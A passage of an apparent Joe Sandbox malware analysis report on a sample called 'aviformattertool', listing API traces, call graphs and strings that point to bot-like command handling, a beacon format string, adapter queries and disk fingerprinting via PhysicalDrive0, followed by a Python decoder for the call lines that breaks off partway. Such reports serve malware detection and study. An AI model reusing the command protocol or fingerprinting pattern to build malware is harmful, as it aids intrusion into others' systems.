19019->19020 19021 2a234db 19020->19021 19022 2a234af __threadstartex@4 19020->19022 19049 2a25a6f 19021->19049 19025 2a2916a __getptd_noexit TlsSetValue 19022->19025 19024 2a234f6 ___crtIsPackagedApp 19027 2a2350a 19024->19027 19033 2a23441 19024->19033 19026 2a234be 19025->19026 19028 2a234d1 GetCurrentThreadId 19026->19028 19029 2a234c4 GetLastError RtlExitUserThread 19026->19029 19039 2a233d2 19027->19039 19028->19024 19029->19028 19034 2a23483 RtlDecodePointer 19033->19034 19035 2a2344a 
LoadLibraryExW GetProcAddress 19033->19035 19038 2a23493 19034->19038 19036 2a2346c 19035->19036 19037 2a2346d RtlEncodePointer 19035->19037 19036->19027 19037->19034 19038->19027 19040 2a233de __setmbcp 19039->19040 19041 2a25bda __setmbcp 59 API calls 19040->19041 19042 2a233e3 19041->19042 19081 2a220e0 19042->19081 19052 2a25a7b __setmbcp 19049->19052 19050 2a25b83 __setmbcp 19050->19024 19051 2a25a94 19054 2a25aa3 19051->19054 19055 2a22ef4 _free 59 API calls 19051->19055 19052->19050 19052->19051 19053 2a22ef4 _free 59 API calls 19052->19053 19053->19051 19056 2a25ab2 19054->19056 19057 2a22ef4 _free 59 API calls 19054->19057 19055->19054 19058 2a25ac1 19056->19058 19059 2a22ef4 _free 59 API calls 19056->19059 19057->19056 19060 2a25ad0 19058->19060 19061 2a22ef4 _free 59 API calls 19058->19061 19059->19058 19062 2a25adf 19060->19062 19063 2a22ef4 _free 59 API calls 19060->19063 19061->19060 19064 2a25aee 19062->19064 19065 2a22ef4 _free 59 API calls 19062->19065 19063->19062 19066 2a25b00 19064->19066 19067 2a22ef4 _free 59 API calls 19064->19067 19065->19064 19068 2a2886d __lock 59 API calls 19066->19068 19067->19066 19072 2a25b08 19068->19072 19069 2a25b2b 19349 2a25b8f 19069->19349 19072->19069 19074 2a22ef4 _free 59 API calls 19072->19074 19074->19069 19099 2a21590 19081->19099 19084 2a22130 19085 2a22128 TlsSetValue 19085->19084 19119 2a215f4 19099->19119 19100 2a21670 19101 2a21686 19100->19101 19103 2a21683 CloseHandle 19100->19103 19105 2a244cb __crtLCMapStringA_stat 6 API calls 19101->19105 19102 2a2160c 19104 2a2164e ResetEvent 19102->19104 19108 2a21625 OpenEventA 19102->19108 19137 2a21b90 19102->19137 19103->19101 19106 2a21655 19104->19106 19109 2a2169e 19105->19109 19141 2a217d0 19106->19141 19107 2a2171c WaitForSingleObject 19107->19119 19111 2a21647 19108->19111 19112 2a2163f 19108->19112 19109->19084 19109->19085 19111->19104 19111->19106 19112->19111 19115 2a21644 CloseHandle 19112->19115 19113 2a216f0 CreateEventA 19113->19119 
19115->19111 19117 2a21b90 GetCurrentProcessId 19117->19119 19119->19100 19119->19102 19119->19107 19119->19113 19119->19117 19120 2a2170e CloseHandle 19119->19120 19120->19119 19151 2a20bf0 19137->19151 19139 2a21be2 GetCurrentProcessId 19140 2a21bf5 19139->19140 19145 2a217df 19141->19145 19151->19139 19355 2a289d7 RtlLeaveCriticalSection 19349->19355 19351 2a25b38 19355->19351 19360 2a22453 19357->19360 19361 2a22519 std::exception::_Copy_str 59 API calls 19360->19361 19362 2a1182a 19361->19362 19362->18900 19369 2a1d68a 19363->19369 19366 2a1cbdd 19378 2a1d6c2 19366->19378 19372 2a1b1ae 19369->19372 19373 2a1b1b8 __EH_prolog 19372->19373 19374 2a22493 std::exception::exception 59 API calls 19373->19374 19375 2a1b1c9 19374->19375 19376 2a17c7e std::bad_exception::bad_exception 60 API calls 19375->19376 19377 2a1a62a 19376->19377 19377->19366 19379 2a1d6cc __EH_prolog 19378->19379 19382 2a1b5a6 19379->19382 19383 2a1b5b0 __EH_prolog 19382->19383 19407 2a29db1 19386->19407 19388 2a25e8f 19389 2a25eb1 19388->19389 19390 2a25e9a 19388->19390 19392 2a25eb6 19389->19392 19397 2a25ec3 __flsbuf 19389->19397 19391 2a25ddb strtoxl 59 API calls 19390->19391 19394 2a25e9f 19391->19394 19393 2a25ddb strtoxl 59 API calls 19392->19393 19393->19394 19394->18428 19395 2a25fa1 19398 2a29dd5 __write 79 API calls 19395->19398 19396 2a25f27 19399 2a25f41 19396->19399 19400 2a25f58 19396->19400 19397->19394 19403 2a25f12 19397->19403 19406 2a25f1d 19397->19406 19414 2a2f722 19397->19414 19398->19394 19426 2a29dd5 19399->19426 19400->19394 19454 2a2f776 19400->19454 19403->19406 19423 2a2f8e5 19403->19423 19406->19395 19406->19396 19408 2a29dd0 19407->19408 19409 2a29dbb 19407->19409 19408->19388 19410 2a25ddb strtoxl 59 API calls 19409->19410 19411 2a29dc0 19410->19411 19412 2a24e75 strtoxl 9 API calls 19411->19412 19413 2a29dcb 19412->19413 19413->19388 19415 2a2f73a 19414->19415 19416 2a2f72d 19414->19416 19418 2a2f746 19415->19418 19419 2a25ddb strtoxl 59 API calls 19415->19419 
19417 2a25ddb strtoxl 59 API calls 19416->19417 19420 2a2f732 19417->19420 19418->19403 19421 2a2f767 19419->19421 19420->19403 19422 2a24e75 strtoxl 9 API calls 19421->19422 19422->19420 19424 2a28a34 __malloc_crt 59 API calls 19423->19424 19425 2a2f8fa 19424->19425 19425->19406 19427 2a29de1 __setmbcp 19426->19427 19428 2a29e05 19427->19428 19429 2a29dee 19427->19429 19430 2a29ea4 19428->19430 19432 2a29e19 19428->19432 19431 2a25da7 __commit 59 API calls 19429->19431 19433 2a25da7 __commit 59 API calls 19430->19433 19434 2a29df3 19431->19434 19435 2a29e41 19432->19435 19436 2a29e37 19432->19436 19440 2a29e3c 19433->19440 19437 2a25ddb strtoxl 59 API calls 19434->19437 19479 2a30c07 19435->19479 19438 2a25da7 __commit 59 API calls 19436->19438 19449 2a29dfa __setmbcp 19437->19449 19438->19440 19442 2a25ddb strtoxl 59 API calls 19440->19442 19441 2a29e47 19443 2a29e5a 19441->19443 19444 2a29e6d 19441->19444 19445 2a29eb0 19442->19445 19488 2a29ec4 19443->19488 19448 2a25ddb strtoxl 59 API calls 19444->19448 19447 2a24e75 strtoxl 9 API calls 19445->19447 19447->19449 19451 2a29e72 19448->19451 19449->19394 19450 2a29e66 19547 2a29e9c 19450->19547 19452 2a25da7 __commit 59 API calls 19451->19452 19452->19450 19455 2a2f782 __setmbcp 19454->19455 19456 2a2f793 19455->19456 19457 2a2f7ab 19455->19457 19458 2a25da7 __commit 59 API calls 19456->19458 19459 2a2f850 19457->19459 19463 2a2f7e0 19457->19463 19460 2a2f798 19458->19460 19461 2a25da7 __commit 59 API calls 19459->19461 19462 2a25ddb strtoxl 59 API calls 19460->19462 19464 2a2f855 19461->19464 19465 2a2f7a0 __setmbcp 19462->19465 19466 2a30c07 ___lock_fhandle 60 API calls 19463->19466 19467 2a25ddb strtoxl 59 API calls 19464->19467 19465->19394 19468 2a2f7e6 19466->19468 19469 2a2f85d 19467->19469 19470 2a2f814 19468->19470 19471 2a2f7fc 19468->19471 19472 2a24e75 strtoxl 9 API calls 19469->19472 19474 2a25ddb strtoxl 59 API calls 19470->19474 19473 2a2f872 __lseeki64_nolock 61 API calls 19471->19473 19472->19465 
19475 2a2f80b 19473->19475 19476 2a2f819 19474->19476 19583 2a2f848 19475->19583 19477 2a25da7 __commit 59 API calls 19476->19477 19477->19475 19481 2a30c13 __setmbcp 19479->19481 19480 2a30c62 RtlEnterCriticalSection 19483 2a30c88 __setmbcp 19480->19483 19481->19480 19482 2a2886d __lock 59 API calls 19481->19482 19484 2a30c38 19482->19484 19483->19441 19485 2a30c50 19484->19485 19486 2a2918c ___lock_fhandle InitializeCriticalSectionAndSpinCount 19484->19486 19550 2a30c8c 19485->19550 19486->19485 19489 2a29ed1 __write_nolock 19488->19489 19490 2a29f10 19489->19490 19491 2a29f2f 19489->19491 19519 2a29f05 19489->19519 19493 2a25da7 __commit 59 API calls 19490->19493 19494 2a29f87 19491->19494 19495 2a29f6b 19491->19495 19492 2a244cb __crtLCMapStringA_stat 6 API calls 19496 2a2a725 19492->19496 19497 2a29f15 19493->19497 19499 2a29fa0 19494->19499 19554 2a2f872 19494->19554 19498 2a25da7 __commit 59 API calls 19495->19498 19496->19450 19500 2a25ddb strtoxl 59 API calls 19497->19500 19504 2a29f70 19498->19504 19503 2a2f722 __read_nolock 59 API calls 19499->19503 19502 2a29f1c 19500->19502 19505 2a24e75 strtoxl 9 API calls 19502->19505 19506 2a29fae 19503->19506 19507 2a25ddb strtoxl 59 API calls 19504->19507 19505->19519 19508 2a2a307 19506->19508 19513 2a25bda __setmbcp 59 API calls 19506->19513 19509 2a29f77 19507->19509 19510 2a2a325 19508->19510 19511 2a2a69a WriteFile 19508->19511 19512 2a24e75 strtoxl 9 API calls 19509->19512 19514 2a2a449 19510->19514 19523 2a2a33b 19510->19523 19515 2a2a2fa GetLastError 19511->19515 19521 2a2a2c7 19511->19521 19512->19519 19516 2a29fda GetConsoleMode 19513->19516 19525 2a2a454 19514->19525 19538 2a2a53e 19514->19538 19515->19521 19516->19508 19518 2a2a019 19516->19518 19517 2a2a6d3 19517->19519 19520 2a25ddb strtoxl 59 API calls 19517->19520 19518->19508 19522 2a2a029 GetConsoleCP 19518->19522 19519->19492 19526 2a2a701 19520->19526 19521->19517 19521->19519 19527 2a2a427 19521->19527 19522->19517 19545 2a2a058 19522->19545 
19523->19517 19523->19521 19524 2a2a3aa WriteFile 19523->19524 19524->19515 19524->19523 19525->19517 19525->19521 19528 2a2a4b9 WriteFile 19525->19528 19529 2a25da7 __commit 59 API calls 19526->19529 19530 2a2a432 19527->19530 19531 2a2a6ca 19527->19531 19528->19515 19528->19525 19529->19519 19533 2a25ddb strtoxl 59 API calls 19530->19533 19534 2a25dba __dosmaperr 59 API calls 19531->19534 19532 2a2a5b3 WideCharToMultiByte 19532->19515 19532->19538 19536 2a2a437 19533->19536 19534->19519 19535 2a2a602 WriteFile 19535->19538 19539 2a2a655 GetLastError 19535->19539 19540 2a25da7 __commit 59 API calls 19536->19540 19538->19517 19538->19521 19538->19532 19538->19535 19539->19538 19540->19519 19541 2a30fd3 WriteConsoleW CreateFileW __putwch_nolock 19541->19545 19542 2a2ff8a 61 API calls __write_nolock 19542->19545 19543 2a2a141 WideCharToMultiByte 19543->19521 19544 2a2a17c WriteFile 19543->19544 19544->19515 19544->19545 19545->19515 19545->19521 19545->19541 19545->19542 19545->19543 19546 2a2a1d6 WriteFile 19545->19546 19563 2a2dcc8 19545->19563 19546->19515 19546->19545 19582 2a30fad RtlLeaveCriticalSection 19547->19582 19549 2a29ea2 19549->19449 19553 2a289d7 RtlLeaveCriticalSection 19550->19553 19552 2a30c93 19552->19480 19553->19552 19566 2a30ec4 19554->19566 19556 2a2f882 19557 2a2f88a 19556->19557 19558 2a2f89b SetFilePointerEx 19556->19558 19559 2a25ddb strtoxl 59 API calls 19557->19559 19560 2a2f8b3 GetLastError 19558->19560 19562 2a2f88f 19558->19562 19559->19562 19561 2a25dba __dosmaperr 59 API calls 19560->19561 19561->19562 19562->19499 19579 2a2dc8e 19563->19579 19567 2a30ecf 19566->19567 19569 2a30ee4 19566->19569 19568 2a25da7 __commit 59 API calls 19567->19568 19570 2a30ed4 19568->19570 19571 2a25da7 __commit 59 API calls 19569->19571 19573 2a30f09 19569->19573 19572 2a25ddb strtoxl 59 API calls 19570->19572 19574 2a30f13 19571->19574 19575 2a30edc 19572->19575 19573->19556 19576 2a25ddb strtoxl 59 API calls 19574->19576 19575->19556 19577 2a30f1b 

Control-flow Graph

APIs
• Sleep.KERNELBASE(0000EA60), ref: 02A16759
• RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A16764
• RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A16775
• InternetOpenA.WININET(?), ref: 02A17306
• InternetSetOptionA.WININET(00000000,00000002,?), ref: 02A1732E
• InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02A17346
• InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02A1735E
• InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02A17387
• InternetReadFile.WININET(00000000,?,00001000,?), ref: 02A173A9
• InternetCloseHandle.WININET(00000000), ref: 02A173C9
• InternetCloseHandle.WININET(00000000), ref: 02A173D4
• RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A1743F
• RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A17450
• _malloc.LIBCMT ref: 02A174E9
• RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A174FB
• RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A17507
• _malloc.LIBCMT ref: 02A175DF
• _strtok.LIBCMT ref: 02A17610
• _swscanf.LIBCMT ref: 02A17627
• _strtok.LIBCMT ref: 02A1763E
• _free.LIBCMT ref: 02A1764A
• Sleep.KERNEL32(000007D0), ref: 02A17742
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A177C3
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A177D5
                                                                                                                                                          • _sprintf.LIBCMT ref: 02A17873
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00000020), ref: 02A17937
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02A1796B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                                                                                                          • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                                                                                          • API String ID: 1657546717-1839899575
                                                                                                                                                          • Opcode ID: 80a09a594984f16e10b26e53c22d65574ae502aebac19f052a45b4e7a3914d80
                                                                                                                                                          • Instruction ID: d2ec68e8df26bf4fc36a686c13cc69d826579fcbd0aeb594873a26ff47db0aa3
                                                                                                                                                          • Opcode Fuzzy Hash: 80a09a594984f16e10b26e53c22d65574ae502aebac19f052a45b4e7a3914d80
                                                                                                                                                          • Instruction Fuzzy Hash: 11320231588381AFE735AF24DD45BAFBBE6AF86320F10081DF58997291EF719409CB52
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(02A471CC), ref: 02A1650B
                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02A16522
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A1652B
                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02A1653A
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A1653D
                                                                                                                                                          • GetTickCount.KERNEL32 ref: 02A16549
                                                                                                                                                            • Part of subcall function 02A160D8: _malloc.LIBCMT ref: 02A160E6
                                                                                                                                                          • GetVersionExA.KERNEL32(02A47030), ref: 02A16576
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165A2
                                                                                                                                                            • Part of subcall function 02A22F2C: __FF_MSGBANNER.LIBCMT ref: 02A22F43
                                                                                                                                                            • Part of subcall function 02A22F2C: __NMSG_WRITE.LIBCMT ref: 02A22F4A
                                                                                                                                                            • Part of subcall function 02A22F2C: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001), ref: 02A22F6F
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165B2
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165BD
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165C8
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165D3
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165DE
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165E9
                                                                                                                                                          • _malloc.LIBCMT ref: 02A165F8
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02A1660F
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A16618
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02A16627
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A1662A
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02A16635
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A16638
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A16672
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A1667F
                                                                                                                                                          • _malloc.LIBCMT ref: 02A166A3
                                                                                                                                                          • _malloc.LIBCMT ref: 02A166B1
                                                                                                                                                          • _malloc.LIBCMT ref: 02A166B8
                                                                                                                                                          • _malloc.LIBCMT ref: 02A166DE
                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 02A166F1
                                                                                                                                                          • Sleep.KERNELBASE ref: 02A166FF
                                                                                                                                                          • _malloc.LIBCMT ref: 02A1670B
                                                                                                                                                          • _malloc.LIBCMT ref: 02A16718
                                                                                                                                                          • Sleep.KERNELBASE(0000EA60), ref: 02A16759
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A16764
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A16775
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                                                                          • String ID: ?uf$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                                                                                          • API String ID: 4273019447-74475266
                                                                                                                                                          • Opcode ID: 2a638af842b7502c3ad5487126a90bf1affb9059814606a29544840468e4b559
                                                                                                                                                          • Instruction ID: 095da4c89d3d5ddd24b24f6c0ac256b8c36907aab591faef72017b6398f35166
                                                                                                                                                          • Opcode Fuzzy Hash: 2a638af842b7502c3ad5487126a90bf1affb9059814606a29544840468e4b559
                                                                                                                                                          • Instruction Fuzzy Hash: E37192B1D88350AFE311AF749D49B1BBBE9EF8A710F01081AF94597280DFB49815CF96
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                                                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                                                                                          • API String ID: 514930453-3667123677
                                                                                                                                                          • Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                                                                                                          • Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
                                                                                                                                                          • Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                                                                                                          • Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02A1F93D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02A1F956
                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02A1F97B
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 02A1FA04
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                                                                          • API String ID: 514930453-3114217049
                                                                                                                                                          • Opcode ID: c31dff395d211fac50435a8e15a07cd69ca15e9eadda8ac2715c53d28769045b
                                                                                                                                                          • Instruction ID: f5d0cfc5c3a0da0b133cbd4adc62d0b7eca805a0859187e344afe3313ca5a98e
                                                                                                                                                          • Opcode Fuzzy Hash: c31dff395d211fac50435a8e15a07cd69ca15e9eadda8ac2715c53d28769045b
                                                                                                                                                          • Instruction Fuzzy Hash: 9521FB71E00389AFDB10EBA8DCC06EEBBF9AF05320F1441A5E445E7604DF348945CBA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

Control-flow graph (interactive rendering not reproduced): basic blocks 2a1f823-2a1f926. Path: CreateFileA (2a1f823; one branch goes straight to the return at 2a1f91f) → DeviceIoControl (2a1f86c). An inner loop over 2a1f8a1-2a1f8c6 calls 2a1f676; the GetLastError block (2a1f8e1) and the call to 2a23acc (2a1f8fb) lead either to the close at 2a1f915 (FindCloseChangeNotification) or back to DeviceIoControl.
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02A1F842
                                                                                                                                                          • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02A1F880
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A1F8E1
                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 02A1F918
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                                                          • String ID: \\.\PhysicalDrive0
                                                                                                                                                          • API String ID: 3786717961-1180397377
                                                                                                                                                          • Opcode ID: 211b8edfd6c571aacd99536fc8a8c44edfa20a7fe596f691645f8b387e3359fa
                                                                                                                                                          • Instruction ID: 9b3468094b5d3521a6f1e9e2e2211bb4af05456913498095249451124aeba658
                                                                                                                                                          • Opcode Fuzzy Hash: 211b8edfd6c571aacd99536fc8a8c44edfa20a7fe596f691645f8b387e3359fa
                                                                                                                                                          • Instruction Fuzzy Hash: CC31C071D0035AAFDF24DFA4D884AAEBBB9FF05764F24416AE505A3680CB705A05CB90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

Control-flow graph (interactive rendering not reproduced): basic blocks 401a4f-401b4a. Path: CreateFileA (401a4f; one branch goes straight to the return at 401b45) → DeviceIoControl (401a98). An inner loop over 401ac2-401af1 calls 402cd0 and 4018cc; block 401afd calls 402cb6; the GetLastError block (401b0e) and the call to 402ca8 (401b27) lead either to the close at 401b3a (FindCloseChangeNotification) or back to DeviceIoControl.
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                                                                                          • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401B0E
                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                                                          • String ID: \\.\PhysicalDrive0
                                                                                                                                                          • API String ID: 3786717961-1180397377
                                                                                                                                                          • Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                                                                                                          • Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
                                                                                                                                                          • Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                                                                                                          • Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%
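Added example (not from the report, from Joe Sandbox or from the sample): a Python decoder for the call lines of the iphlpapi/GetAdaptersInfo entry and the two \\.\PhysicalDrive0 entries above. The constants it names are the documented Windows values: 0x2D1400 is CTL_CODE(FILE_DEVICE_MASS_STORAGE, 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS), i.e. IOCTL_STORAGE_QUERY_PROPERTY, and the 0xC-byte input buffer matches sizeof(STORAGE_PROPERTY_QUERY); in CreateFileA the desired-access argument is 0 and the share mode is 7, so the handle can issue that query but cannot read or write sectors. Reading the two patterns as host identification (adapter MACs, disk descriptor) is an inference from the calls, not something the report states. The sample lines are copied from the entries; FindCloseChangeNotification.KERNELBASE is the tracer's label for the kernelbase export at the CloseHandle address and is read here as a plain close.

```python
r"""Decoder for the Win32 call lines in the report entries above.

Added example, not part of the Joe Sandbox report or of the sample: it parses
the "API.MODULE(args), ref: addr" lines for the iphlpapi/GetAdaptersInfo entry
and the two \\.\PhysicalDrive0 entries, expands the numeric arguments into the
documented Windows constants, and names the two host-identification patterns.
"""
import re

CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Constructed sample input: call lines copied in the form the report prints them.
SAMPLE_LINES = [
    "LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02A1F93D",
    "GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02A1F956",
    "GetAdaptersInfo.IPHLPAPI(?,?), ref: 02A1F97B",
    "FreeLibrary.KERNEL32(00000000), ref: 02A1FA04",
    r"CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02A1F842",
    "DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02A1F880",
    "GetLastError.KERNEL32 ref: 02A1F8E1",
    "FindCloseChangeNotification.KERNELBASE(?), ref: 02A1F918",
]

# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
KNOWN_IOCTLS = {0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}   # CTL_CODE(0x2D, 0x500, 0, 0)
DEVICE_TYPES = {0x2D: "FILE_DEVICE_MASS_STORAGE"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
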